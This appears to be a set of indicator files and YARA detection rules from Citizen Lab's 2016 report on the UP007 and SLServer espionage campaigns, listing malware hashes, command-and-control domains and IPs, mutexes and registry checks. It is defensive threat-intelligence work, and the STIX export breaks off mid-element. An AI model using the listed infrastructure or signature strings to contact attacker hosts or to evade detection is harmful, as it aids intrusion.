This directory contains IOC from the Citizen Lab report ["Between Hong Kong and Burma: Tracking UP007 and SLServer Espionage Campaigns"](https://citizenlab.org/2016/04/between-hong-kong-and-burma/) published the 18th of April 2016.
Files included in this directory:
* openioc.ioc : IOCs in OpenIOC format
* stix.xml : IOCs in STIX XML format
* iocs.csv : IOCs in csv format
* rules.yar : Yara rules

View File

@@ -0,0 +1,25 @@
uuid,event_id,category,type,value,comment,to_ids,date
581ba7b8-59f4-402f-95d9-497a8e96ca05,2,Payload type,text,"UP007","",0,20160418
581ba817-0954-44a7-afce-49798e96ca05,2,Payload delivery,md5,"6a541de84074a2c4ff99eb43252d9030","",1,20160418
581ba817-1620-457c-ae64-49798e96ca05,2,Payload delivery,md5,"cfcd2a90e87156e1a811f9c7b0051002","",1,20160418
581ba817-1d18-4479-997f-49798e96ca05,2,Payload delivery,md5,"d8becbd6f188e3fb2c4d23a2d36d137b","",1,20160418
581ba817-2ce0-4046-9865-49798e96ca05,2,Payload delivery,md5,"09ddd70517cb48a46d9f93644b29c72f","",1,20160418
581ba817-4924-41de-9ce9-49798e96ca05,2,Payload delivery,md5,"dc195d814ec16fe91690b7e949e696f6","",1,20160418
581ba817-5a08-4dff-a2d8-49798e96ca05,2,Payload delivery,md5,"ce8ec932be16b69ffa06626b3b423395","",1,20160418
581ba817-8010-4c55-a7c9-49798e96ca05,2,Payload delivery,md5,"397021af7c0284c28db65297a6711235","",1,20160418
581ba817-8d0c-4716-90dc-49798e96ca05,2,Payload delivery,md5,"d8ede9e6c3a1a30398b0b98130ee3b38","",1,20160418
581ba817-91f4-4e92-9164-49798e96ca05,2,Payload delivery,md5,"f70b295c6a5121b918682310ce0c2165","",1,20160418
581ba817-9adc-4354-9b03-49798e96ca05,2,Payload delivery,md5,"d07b2738840ce3419df651d3a0a3a246","",1,20160418
581ba817-ad74-4d70-bc5a-49798e96ca05,2,Payload delivery,md5,"639c7239f40d95f677a99abb059e8338","",1,20160418
581ba817-c96c-4e46-bd92-49798e96ca05,2,Payload delivery,md5,"e0eb981ad6be0bd16246d5d442028687","",1,20160418
581ba817-cf4c-42ae-b661-49798e96ca05,2,Payload delivery,md5,"f80edbb0fcfe7cec17592f61a06e4df2","",1,20160418
581ba817-d2a4-4dcb-b1b3-49798e96ca05,2,Payload delivery,md5,"d579d7a42ff140952da57264614c37bc","",1,20160418
581ba833-2410-4a7c-a67f-497a8e96ca05,2,Network activity,domain,"computer.security-centers.com","C2 servers",1,20160418
581ba833-4eb8-4589-ad6e-497a8e96ca05,2,Network activity,domain,"tenday.mysecondarydns.com","C2 servers",1,20160418
581ba833-5f7c-40f0-b2d4-497a8e96ca05,2,Network activity,domain,"safetyssl.security-centers.com","C2 servers",1,20160418
581ba833-6060-4ce6-b102-497a8e96ca05,2,Network activity,domain,"hkemail.f3322.org","C2 servers",1,20160418
581ba833-71b8-4f00-b1f8-497a8e96ca05,2,Network activity,domain,"www.olinaodi.com","C2 servers",1,20160418
581ba849-3730-4528-a94e-49798e96ca05,2,Network activity,ip-dst,"59.188.12.123","IP behind C2 domains",1,20161110
581ba849-a850-4cbf-a6b2-49798e96ca05,2,Network activity,ip-dst,"210.61.12.153","IP behind C2 domains",1,20161110
581ba88c-c144-41d1-ad67-497a8e96ca05,2,Payload type,text,"SLServer","",0,20160418
581ba8ac-e8a4-4fa0-b8f1-49798e96ca05,2,Internal reference,link,"https://citizenlab.org/2016/04/between-hong-kong-and-burma/","",0,20160418
1 uuid event_id category type value comment to_ids date
2 581ba7b8-59f4-402f-95d9-497a8e96ca05 2 Payload type text UP007 0 20160418
3 581ba817-0954-44a7-afce-49798e96ca05 2 Payload delivery md5 6a541de84074a2c4ff99eb43252d9030 1 20160418
4 581ba817-1620-457c-ae64-49798e96ca05 2 Payload delivery md5 cfcd2a90e87156e1a811f9c7b0051002 1 20160418
5 581ba817-1d18-4479-997f-49798e96ca05 2 Payload delivery md5 d8becbd6f188e3fb2c4d23a2d36d137b 1 20160418
6 581ba817-2ce0-4046-9865-49798e96ca05 2 Payload delivery md5 09ddd70517cb48a46d9f93644b29c72f 1 20160418
7 581ba817-4924-41de-9ce9-49798e96ca05 2 Payload delivery md5 dc195d814ec16fe91690b7e949e696f6 1 20160418
8 581ba817-5a08-4dff-a2d8-49798e96ca05 2 Payload delivery md5 ce8ec932be16b69ffa06626b3b423395 1 20160418
9 581ba817-8010-4c55-a7c9-49798e96ca05 2 Payload delivery md5 397021af7c0284c28db65297a6711235 1 20160418
10 581ba817-8d0c-4716-90dc-49798e96ca05 2 Payload delivery md5 d8ede9e6c3a1a30398b0b98130ee3b38 1 20160418
11 581ba817-91f4-4e92-9164-49798e96ca05 2 Payload delivery md5 f70b295c6a5121b918682310ce0c2165 1 20160418
12 581ba817-9adc-4354-9b03-49798e96ca05 2 Payload delivery md5 d07b2738840ce3419df651d3a0a3a246 1 20160418
13 581ba817-ad74-4d70-bc5a-49798e96ca05 2 Payload delivery md5 639c7239f40d95f677a99abb059e8338 1 20160418
14 581ba817-c96c-4e46-bd92-49798e96ca05 2 Payload delivery md5 e0eb981ad6be0bd16246d5d442028687 1 20160418
15 581ba817-cf4c-42ae-b661-49798e96ca05 2 Payload delivery md5 f80edbb0fcfe7cec17592f61a06e4df2 1 20160418
16 581ba817-d2a4-4dcb-b1b3-49798e96ca05 2 Payload delivery md5 d579d7a42ff140952da57264614c37bc 1 20160418
17 581ba833-2410-4a7c-a67f-497a8e96ca05 2 Network activity domain computer.security-centers.com C2 servers 1 20160418
18 581ba833-4eb8-4589-ad6e-497a8e96ca05 2 Network activity domain tenday.mysecondarydns.com C2 servers 1 20160418
19 581ba833-5f7c-40f0-b2d4-497a8e96ca05 2 Network activity domain safetyssl.security-centers.com C2 servers 1 20160418
20 581ba833-6060-4ce6-b102-497a8e96ca05 2 Network activity domain hkemail.f3322.org C2 servers 1 20160418
21 581ba833-71b8-4f00-b1f8-497a8e96ca05 2 Network activity domain www.olinaodi.com C2 servers 1 20160418
22 581ba849-3730-4528-a94e-49798e96ca05 2 Network activity ip-dst 59.188.12.123 IP behind C2 domains 1 20161110
23 581ba849-a850-4cbf-a6b2-49798e96ca05 2 Network activity ip-dst 210.61.12.153 IP behind C2 domains 1 20161110
24 581ba88c-c144-41d1-ad67-497a8e96ca05 2 Payload type text SLServer 0 20160418
25 581ba8ac-e8a4-4fa0-b8f1-49798e96ca05 2 Internal reference link https://citizenlab.org/2016/04/between-hong-kong-and-burma/ 0 20160418

View File

@@ -0,0 +1,97 @@
<?xml version="1.0" encoding="utf-8"?>
<ioc xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" id="581ba774-6db4-441c-b981-49798e96ca05" last-modified="2016-04-18T00:00:00" xmlns="http://schemas.mandiant.com/2010/ioc">
<short_description>Event #2</short_description>
<description>Tracking UP007 and SLServer Espionage Campaigns</description>
<keywords />
<authored_by>citizenlab</authored_by>
<authored_date>2016-04-18T00:00:00</authored_date>
<links />
<definition>
<Indicator operator="OR" id="581ba774-6db4-441c-b981-49798e96ca05">
<IndicatorItem id="safetyssl.security-centers.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="computer.security-centers.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="hkemail.f3322.org" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="www.olinaodi.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="tenday.mysecondarydns.com" condition="is">
<Context document="Network" search="Network/DNS" type="mir" />
<Content type="string"></Content>
</IndicatorItem>
<IndicatorItem id="59.188.12.123" condition="is">
<Context document="RouteEntryItem" search="RouteEntryItem/Destination" type="mir" />
<Content type="IP"></Content>
</IndicatorItem>
<IndicatorItem id="210.61.12.153" condition="is">
<Context document="RouteEntryItem" search="RouteEntryItem/Destination" type="mir" />
<Content type="IP"></Content>
</IndicatorItem>
<IndicatorItem id="d579d7a42ff140952da57264614c37bc" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="d8becbd6f188e3fb2c4d23a2d36d137b" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="09ddd70517cb48a46d9f93644b29c72f" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="f70b295c6a5121b918682310ce0c2165" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="f80edbb0fcfe7cec17592f61a06e4df2" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="d8ede9e6c3a1a30398b0b98130ee3b38" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="ce8ec932be16b69ffa06626b3b423395" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="6a541de84074a2c4ff99eb43252d9030" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="e0eb981ad6be0bd16246d5d442028687" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="639c7239f40d95f677a99abb059e8338" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="d07b2738840ce3419df651d3a0a3a246" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="397021af7c0284c28db65297a6711235" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="dc195d814ec16fe91690b7e949e696f6" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
<IndicatorItem id="cfcd2a90e87156e1a811f9c7b0051002" condition="is">
<Context document="FileItem" search="FileItem/Md5sum" type="mir" />
<Content type="md5"></Content>
</IndicatorItem>
</Indicator>
</definition>
</ioc>

View File

@@ -0,0 +1,190 @@
rule dubseven_file_set
{
meta:
author = "Matt Brooks, @cmatthewbrooks"
desc = "Searches for service files loading UP007"
strings:
$file1 = "\\Microsoft\\Internet Explorer\\conhost.exe"
$file2 = "\\Microsoft\\Internet Explorer\\dll2.xor"
$file3 = "\\Microsoft\\Internet Explorer\\HOOK.DLL"
$file4 = "\\Microsoft\\Internet Explorer\\main.dll"
$file5 = "\\Microsoft\\Internet Explorer\\nvsvc.exe"
$file6 = "\\Microsoft\\Internet Explorer\\SBieDll.dll"
$file7 = "\\Microsoft\\Internet Explorer\\mon"
$file8 = "\\Microsoft\\Internet Explorer\\runas.exe"
condition:
//MZ header
uint16(0) == 0x5A4D and
//PE signature
uint32(uint32(0x3C)) == 0x00004550 and
//Just a few of these as they differ
3 of ($file*)
}
rule dubseven_dropper_registry_checks
{
meta:
author = "Matt Brooks, @cmatthewbrooks"
desc = "Searches for registry keys checked for by the dropper"
strings:
$reg1 = "SOFTWARE\\360Safe\\Liveup"
$reg2 = "Software\\360safe"
$reg3 = "SOFTWARE\\kingsoft\\Antivirus"
$reg4 = "SOFTWARE\\Avira\\Avira Destop"
$reg5 = "SOFTWARE\\rising\\RAV"
$reg6 = "SOFTWARE\\JiangMin"
$reg7 = "SOFTWARE\\Micropoint\\Anti-Attack"
condition:
//MZ header
uint16(0) == 0x5A4D and
//PE signature
uint32(uint32(0x3C)) == 0x00004550 and
all of ($reg*)
}
rule dubseven_dropper_dialog_remains
{
meta:
author = "Matt Brooks, @cmatthewbrooks"
desc = "Searches for related dialog remnants. How rude."
strings:
$dia1 = "fuckMessageBox 1.0" wide
$dia2 = "Rundll 1.0" wide
condition:
//MZ header
uint16(0) == 0x5A4D and
//PE signature
uint32(uint32(0x3C)) == 0x00004550 and
any of them
}
rule maindll_mutex
{
meta:
author = "Matt Brooks, @cmatthewbrooks"
desc = "Matches on the maindll mutex"
strings:
$mutex = "h31415927tttt"
condition:
//MZ header
uint16(0) == 0x5A4D and
//PE signature
uint32(uint32(0x3C)) == 0x00004550 and
$mutex
}
rule SLServer_dialog_remains
{
meta:
author = "Matt Brooks, @cmatthewbrooks"
desc = "Searches for related dialog remnants."
strings:
$slserver = "SLServer" wide
condition:
//MZ header
uint16(0) == 0x5A4D and
//PE signature
uint32(uint32(0x3C)) == 0x00004550 and
$slserver
}
rule SLServer_mutex
{
meta:
author = "Matt Brooks, @cmatthewbrooks"
desc = "Searches for the mutex."
strings:
$mutex = "M&GX^DSF&DA@F"
condition:
//MZ header
uint16(0) == 0x5A4D and
//PE signature
uint32(uint32(0x3C)) == 0x00004550 and
$mutex
}
rule SLServer_command_and_control
{
meta:
author = "Matt Brooks, @cmatthewbrooks"
desc = "Searches for the C2 server."
strings:
$c2 = "safetyssl.security-centers.com"
condition:
//MZ header
uint16(0) == 0x5A4D and
//PE signature
uint32(uint32(0x3C)) == 0x00004550 and
$c2
}
rule SLServer_campaign_code
{
meta:
author = "Matt Brooks, @cmatthewbrooks"
desc = "Searches for the related campaign code."
strings:
$campaign = "wthkdoc0106"
condition:
//MZ header
uint16(0) == 0x5A4D and
//PE signature
uint32(uint32(0x3C)) == 0x00004550 and
$campaign
}
rule SLServer_unknown_string
{
meta:
author = "Matt Brooks, @cmatthewbrooks"
desc = "Searches for a unique string."
strings:
$string = "test-b7fa835a39"
condition:
//MZ header
uint16(0) == 0x5A4D and
//PE signature
uint32(uint32(0x3C)) == 0x00004550 and
$string
}

View File

@@ -0,0 +1,982 @@
<stix:STIX_Package
xmlns:cyboxCommon="http://cybox.mitre.org/common-2"
xmlns:cybox="http://cybox.mitre.org/cybox-2"
xmlns:cyboxVocabs="http://cybox.mitre.org/default_vocabularies-2"
xmlns:ASObj="http://cybox.mitre.org/objects#ASObject-1"
xmlns:AddressObj="http://cybox.mitre.org/objects#AddressObject-2"
xmlns:DomainNameObj="http://cybox.mitre.org/objects#DomainNameObject-1"
xmlns:EmailMessageObj="http://cybox.mitre.org/objects#EmailMessageObject-2"
xmlns:FileObj="http://cybox.mitre.org/objects#FileObject-2"
xmlns:HTTPSessionObj="http://cybox.mitre.org/objects#HTTPSessionObject-2"
xmlns:HostnameObj="http://cybox.mitre.org/objects#HostnameObject-1"
xmlns:MutexObj="http://cybox.mitre.org/objects#MutexObject-2"
xmlns:PipeObj="http://cybox.mitre.org/objects#PipeObject-2"
xmlns:URIObj="http://cybox.mitre.org/objects#URIObject-2"
xmlns:WinRegistryKeyObj="http://cybox.mitre.org/objects#WinRegistryKeyObject-2"
xmlns:marking="http://data-marking.mitre.org/Marking-1"
xmlns:tlpMarking="http://data-marking.mitre.org/extensions/MarkingStructure#TLP-1"
xmlns:et="http://stix.mitre.org/ExploitTarget-1"
xmlns:incident="http://stix.mitre.org/Incident-1"
xmlns:indicator="http://stix.mitre.org/Indicator-2"
xmlns:ttp="http://stix.mitre.org/TTP-1"
xmlns:ta="http://stix.mitre.org/ThreatActor-1"
xmlns:stixCommon="http://stix.mitre.org/common-1"
xmlns:stixVocabs="http://stix.mitre.org/default_vocabularies-1"
xmlns:stix-ciqidentity="http://stix.mitre.org/extensions/Identity#CIQIdentity3.0-1"
xmlns:snortTM="http://stix.mitre.org/extensions/TestMechanism#Snort-1"
xmlns:stix="http://stix.mitre.org/stix-1"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:="https://rufus.citlab.utoronto.ca"
xmlns:xal="urn:oasis:names:tc:ciq:xal:3"
xmlns:xnl="urn:oasis:names:tc:ciq:xnl:3"
xmlns:xpil="urn:oasis:names:tc:ciq:xpil:3"
xsi:schemaLocation="
http://cybox.mitre.org/common-2 http://cybox.mitre.org/XMLSchema/common/2.1/cybox_common.xsd
http://cybox.mitre.org/cybox-2 http://cybox.mitre.org/XMLSchema/core/2.1/cybox_core.xsd
http://cybox.mitre.org/default_vocabularies-2 http://cybox.mitre.org/XMLSchema/default_vocabularies/2.1/cybox_default_vocabularies.xsd
http://cybox.mitre.org/objects#ASObject-1 http://cybox.mitre.org/XMLSchema/objects/AS/1.0/AS_Object.xsd
http://cybox.mitre.org/objects#AddressObject-2 http://cybox.mitre.org/XMLSchema/objects/Address/2.1/Address_Object.xsd
http://cybox.mitre.org/objects#DomainNameObject-1 http://cybox.mitre.org/XMLSchema/objects/Domain_Name/1.0/Domain_Name_Object.xsd
http://cybox.mitre.org/objects#EmailMessageObject-2 http://cybox.mitre.org/XMLSchema/objects/Email_Message/2.1/Email_Message_Object.xsd
http://cybox.mitre.org/objects#FileObject-2 http://cybox.mitre.org/XMLSchema/objects/File/2.1/File_Object.xsd
http://cybox.mitre.org/objects#HTTPSessionObject-2 http://cybox.mitre.org/XMLSchema/objects/HTTP_Session/2.1/HTTP_Session_Object.xsd
http://cybox.mitre.org/objects#HostnameObject-1 http://cybox.mitre.org/XMLSchema/objects/Hostname/1.0/Hostname_Object.xsd
http://cybox.mitre.org/objects#MutexObject-2 http://cybox.mitre.org/XMLSchema/objects/Mutex/2.1/Mutex_Object.xsd
http://cybox.mitre.org/objects#PipeObject-2 http://cybox.mitre.org/XMLSchema/objects/Pipe/2.1/Pipe_Object.xsd
http://cybox.mitre.org/objects#URIObject-2 http://cybox.mitre.org/XMLSchema/objects/URI/2.1/URI_Object.xsd
http://cybox.mitre.org/objects#WinRegistryKeyObject-2 http://cybox.mitre.org/XMLSchema/objects/Win_Registry_Key/2.1/Win_Registry_Key_Object.xsd
http://data-marking.mitre.org/Marking-1 http://stix.mitre.org/XMLSchema/data_marking/1.1.1/data_marking.xsd
http://data-marking.mitre.org/extensions/MarkingStructure#TLP-1 http://stix.mitre.org/XMLSchema/extensions/marking/tlp/1.1.1/tlp_marking.xsd
http://stix.mitre.org/ExploitTarget-1 http://stix.mitre.org/XMLSchema/exploit_target/1.1.1/exploit_target.xsd
http://stix.mitre.org/Incident-1 http://stix.mitre.org/XMLSchema/incident/1.1.1/incident.xsd
http://stix.mitre.org/Indicator-2 http://stix.mitre.org/XMLSchema/indicator/2.1.1/indicator.xsd
http://stix.mitre.org/TTP-1 http://stix.mitre.org/XMLSchema/ttp/1.1.1/ttp.xsd
http://stix.mitre.org/ThreatActor-1 http://stix.mitre.org/XMLSchema/threat_actor/1.1.1/threat_actor.xsd
http://stix.mitre.org/common-1 http://stix.mitre.org/XMLSchema/common/1.1.1/stix_common.xsd
http://stix.mitre.org/default_vocabularies-1 http://stix.mitre.org/XMLSchema/default_vocabularies/1.1.1/stix_default_vocabularies.xsd
http://stix.mitre.org/extensions/Identity#CIQIdentity3.0-1 http://stix.mitre.org/XMLSchema/extensions/identity/ciq_3.0/1.1.1/ciq_3.0_identity.xsd
http://stix.mitre.org/extensions/TestMechanism#Snort-1 http://stix.mitre.org/XMLSchema/extensions/test_mechanism/snort/1.1.1/snort_test_mechanism.xsd
http://stix.mitre.org/stix-1 http://stix.mitre.org/XMLSchema/core/1.1.1/stix_core.xsd
urn:oasis:names:tc:ciq:xal:3 http://stix.mitre.org/XMLSchema/external/oasis_ciq_3.0/xAL.xsd
urn:oasis:names:tc:ciq:xnl:3 http://stix.mitre.org/XMLSchema/external/oasis_ciq_3.0/xNL.xsd
urn:oasis:names:tc:ciq:xpil:3 http://stix.mitre.org/XMLSchema/external/oasis_ciq_3.0/xPIL.xsd" id=":Package-c2b4b6fc-b3a6-407c-b4dc-da81c5b00eec" version="1.1.1" timestamp="2016-11-10T20:57:45.659431+00:00">
<stix:STIX_Header>
<stix:Title>Export from MISP</stix:Title>
<stix:Package_Intent xsi:type="stixVocabs:PackageIntentVocab-1.0">Threat Report</stix:Package_Intent>
</stix:STIX_Header>
<stix:Related_Packages>
<stix:Related_Package>
<stix:Package id=":STIXPackage-581ba774-6db4-441c-b981-49798e96ca05" version="1.1.1" timestamp="2016-11-10T15:54:41+00:00">
<stix:STIX_Header>
<stix:Title>Tracking UP007 and SLServer Espionage Campaigns (MISP Event #2)</stix:Title>
<stix:Package_Intent xsi:type="stixVocabs:PackageIntentVocab-1.0">Threat Report</stix:Package_Intent>
</stix:STIX_Header>
<stix:TTPs>
<stix:TTP id=":ttp-581ba7b8-59f4-402f-95d9-497a8e96ca05" timestamp="2016-11-03T17:10:16+00:00" xsi:type='ttp:TTPType'>
<ttp:Title>Payload type: UP007 (MISP Attribute #30)</ttp:Title>
<ttp:Behavior>
<ttp:Malware>
<ttp:Malware_Instance>
<ttp:Name>UP007</ttp:Name>
</ttp:Malware_Instance>
</ttp:Malware>
</ttp:Behavior>
</stix:TTP>
<stix:TTP id=":ttp-581ba88c-c144-41d1-ad67-497a8e96ca05" timestamp="2016-11-03T17:13:48+00:00" xsi:type='ttp:TTPType'>
<ttp:Title>Payload type: SLServer (MISP Attribute #52)</ttp:Title>
<ttp:Behavior>
<ttp:Malware>
<ttp:Malware_Instance>
<ttp:Name>SLServer</ttp:Name>
</ttp:Malware_Instance>
</ttp:Malware>
</ttp:Behavior>
</stix:TTP>
</stix:TTPs>
<stix:Incidents>
<stix:Incident id=":incident-581ba774-6db4-441c-b981-49798e96ca05" timestamp="2016-11-10T15:57:11+00:00" xsi:type='incident:IncidentType'>
<incident:Title>Tracking UP007 and SLServer Espionage Campaigns</incident:Title>
<incident:External_ID source="MISP Event">2</incident:External_ID>
<incident:Time>
<incident:Incident_Discovery precision="second">2016-04-18T00:00:00+00:00</incident:Incident_Discovery>
<incident:Incident_Reported precision="second">2016-11-10T15:57:11+00:00</incident:Incident_Reported>
</incident:Time>
<incident:Status xsi:type="stixVocabs:IncidentStatusVocab-1.0">Closed</incident:Status>
<incident:Related_Indicators>
<incident:Related_Indicator>
<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-581ba833-5f7c-40f0-b2d4-497a8e96ca05" timestamp="2016-11-03T17:12:19+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Network activity: safetyssl.security-centers.com (MISP Attribute #45)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Domain Watchlist</indicator:Type>
<indicator:Description>Network activity: safetyssl.security-centers.com (MISP Attribute #45)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-581ba833-5f7c-40f0-b2d4-497a8e96ca05">
<cybox:Object id=":DomainName-581ba833-5f7c-40f0-b2d4-497a8e96ca05">
<cybox:Properties xsi:type="DomainNameObj:DomainNameObjectType">
<DomainNameObj:Value condition="Equals">safetyssl.security-centers.com</DomainNameObj:Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba7b8-59f4-402f-95d9-497a8e96ca05" timestamp="2016-11-03T17:10:16+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba88c-c144-41d1-ad67-497a8e96ca05" timestamp="2016-11-03T17:13:48+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-03T17:12:19+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-581ba833-2410-4a7c-a67f-497a8e96ca05" timestamp="2016-11-03T17:12:19+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Network activity: computer.security-centers.com (MISP Attribute #46)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Domain Watchlist</indicator:Type>
<indicator:Description>Network activity: computer.security-centers.com (MISP Attribute #46)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-581ba833-2410-4a7c-a67f-497a8e96ca05">
<cybox:Object id=":DomainName-581ba833-2410-4a7c-a67f-497a8e96ca05">
<cybox:Properties xsi:type="DomainNameObj:DomainNameObjectType">
<DomainNameObj:Value condition="Equals">computer.security-centers.com</DomainNameObj:Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba7b8-59f4-402f-95d9-497a8e96ca05" timestamp="2016-11-03T17:10:16+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba88c-c144-41d1-ad67-497a8e96ca05" timestamp="2016-11-03T17:13:48+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-03T17:12:19+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-581ba833-6060-4ce6-b102-497a8e96ca05" timestamp="2016-11-03T17:12:19+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Network activity: hkemail.f3322.org (MISP Attribute #47)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Domain Watchlist</indicator:Type>
<indicator:Description>Network activity: hkemail.f3322.org (MISP Attribute #47)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-581ba833-6060-4ce6-b102-497a8e96ca05">
<cybox:Object id=":DomainName-581ba833-6060-4ce6-b102-497a8e96ca05">
<cybox:Properties xsi:type="DomainNameObj:DomainNameObjectType">
<DomainNameObj:Value condition="Equals">hkemail.f3322.org</DomainNameObj:Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba7b8-59f4-402f-95d9-497a8e96ca05" timestamp="2016-11-03T17:10:16+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba88c-c144-41d1-ad67-497a8e96ca05" timestamp="2016-11-03T17:13:48+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-03T17:12:19+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
<stixCommon:Relationship>Network activity</stixCommon:Relationship>
<stixCommon:Indicator id=":indicator-581ba833-71b8-4f00-b1f8-497a8e96ca05" timestamp="2016-11-03T17:12:19+00:00" xsi:type='indicator:IndicatorType'>
<indicator:Title>Network activity: www.olinaodi.com (MISP Attribute #48)</indicator:Title>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Malware Artifacts</indicator:Type>
<indicator:Type xsi:type="stixVocabs:IndicatorTypeVocab-1.1">Domain Watchlist</indicator:Type>
<indicator:Description>Network activity: www.olinaodi.com (MISP Attribute #48)</indicator:Description>
<indicator:Valid_Time_Position/>
<indicator:Observable id=":observable-581ba833-71b8-4f00-b1f8-497a8e96ca05">
<cybox:Object id=":DomainName-581ba833-71b8-4f00-b1f8-497a8e96ca05">
<cybox:Properties xsi:type="DomainNameObj:DomainNameObjectType">
<DomainNameObj:Value condition="Equals">www.olinaodi.com</DomainNameObj:Value>
</cybox:Properties>
</cybox:Object>
</indicator:Observable>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba7b8-59f4-402f-95d9-497a8e96ca05" timestamp="2016-11-03T17:10:16+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Indicated_TTP>
<stixCommon:TTP idref=":ttp-581ba88c-c144-41d1-ad67-497a8e96ca05" timestamp="2016-11-03T17:13:48+00:00" xsi:type='ttp:TTPType'/>
</indicator:Indicated_TTP>
<indicator:Confidence timestamp="2016-11-03T17:12:19+00:00">
<stixCommon:Value xsi:type="stixVocabs:HighMediumLowVocab-1.0">High</stixCommon:Value>
<stixCommon:Description>Derived from MISP's IDS flag. If an attribute is marked for IDS exports, the confidence will be high, otherwise none</stixCommon:Description>
</indicator:Confidence>
</stixCommon:Indicator>
</incident:Related_Indicator>
<incident:Related_Indicator>
